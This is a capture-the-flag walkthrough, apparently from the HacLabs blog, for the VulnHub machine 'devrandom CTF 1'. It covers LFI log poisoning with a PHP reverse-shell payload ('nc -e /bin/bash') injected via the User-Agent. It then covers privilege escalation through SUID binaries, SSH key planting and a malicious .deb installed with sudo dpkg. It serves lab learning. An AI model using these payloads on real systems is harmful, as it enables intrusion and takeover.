devrandom CTF 1

In this article we are going to solve another boot2root challenge . This is a beginner level challenge . We can download this box from vulnhhub.


walkthrough


So as usual we are going to find the IP address of the target using the command : sudo netdiscover -i wlan0


Now by using the command nmap -A 192.168.43.45 we checked for the open ports and services running in the system.

As we can see that only 2 ports are open . So we decided to enumerate HTTP service , and the website has a very cool image in it that says website is closed . So we start enumerating more using directory bruteforce , command used : sudo dirb http://192.168.43.45

Now one by one we decided to open every webpage .


So now we have 3 entries in this file and we decided to open them. In the webpage /?include=info we found that it is vulnerable to LFI .

So now we tried to read different files in the system if we can get something useful but we found nothing . This is a LFI vulnerability and we can use log poisoning attack and from there we can have a reverse shell.

But to perform log poisoning attack we should be able to include some files like access.log or auth.log . So we decided to again run the directory bruteforce using dirbuster with extension php and we found the webpage /log.php

so we decided to open this file and found very interesting file in the very first line.

So now we have the path of access.log file and from here we can perform log poisoning attack!

So now we decided to open the file /var/www/html/access.log using LFI vulnerability .

Now we intercept the packet using burp suite , and to perform log poisoning attack we can tamper the User-Agent parameter and can inject our code there!

As we can see here that to take reverse shell we have injected our php code in User-Agent and now we have the reverse shell

code : <?php echo shell_exec('nc -e /bin/bash <your ip> <open port>'); ?>

Now we have our reverse shell and by using python-one-liner we get a shell.

Now privilege escalation part.

by typing ls we can see different files present in this directory and we found a interesting file secret.php and using the command cat secret.php we check its content and found the password of user victor in md5 hash format we decided to crack it and found the password to be irminsul .

Now we are in as user victor and we checked for the privileges using the command sudo -l but nothing was there . So we decided to check for SUID binary using the command : find / -perm -u=s -type f 2>/dev/null

/home/victor/bin/find is very helpful for us we change our directory to /home/victor/bin/find

As described in the gtfobins we can use this for privilege escalation . now we use the trick from gtfobins and we are in as user john

now we change our directory to /home/john and there we found a file with name .private and we checked the content of this file and we found text dropbox2010

we use this as the password for user lisa and succeed in login as user lisa.

Now we again check for the SUID binary using the same command and again we have a interesting binary inside the directory /home/lisa/bin/

now there are many methods for privilege escalation using copy binary but here we succeed with the method :

  • change directory to /tmp

  • create two files as id_rsa.pub and id_rsa

  • use ssh-keygen to generate new key pairs

  • copy id_rsa.pub to /home/henri/.ssh/authorized_keys

  • connect to ssh as user henri by using id_rsa file.

Now copy the id_rsa.pub to /home/henri/.ssh/authorized_keys and change the permission of id_rsa using the command chmod 400 id_rsa and then connect to ssh as user henri.

we are in as henri , and we check the home directory of this user and found two things.

dust directory was empty so we decided to check for the SUID binary and found this.

now we change our directory to /usr/local/bin and there we have the SUID binary which is owned by the root , we execute this using ./cmd and we are in as user trevor

Now this time we checked for the user privileges using the command sudo -l and found very interesting result.

we again take the help of gtfobins and found that we can use this for privilege escalation and can take the shell of user root!

now we need x_1.0_all.deb package to install and for that we use our kali linux machine and build this .deb package and transfer this to the target machine .

Now we downloaded this package in the target machine using wget command.

now install the package using the command sudo -u root /usr/bin/dpkg -i x_1.0_all.deb ,and we are in as user root!

Now let us read the final flag by executing this command .

Yipee!! finally the challenge is completed!


NOTE : This is the intended way to solve this machine . Second method is to bruteforce the password of user trevor and then follow the dpkg part and get the root in an easy way! but following the first approach is very beneficial for us.


If we follow the approach described in this article then I will rate this machine is as intermediate level for a beginner in CTF challenge because there are many things to learn for privilege escalation.


Recent Posts

See All

Website change notice

As you all know that our website is providing walkthrough of different challenges from different platforms and without any advertisement but due to some funds issue we can't continue this website :( S

Subscribe to HacLabs newsletter

Get priority notification on the release of the latest articles.

  • YouTube
  • Twitter
  • Instagram
  • Linkedin

© 2020 by HacLabs.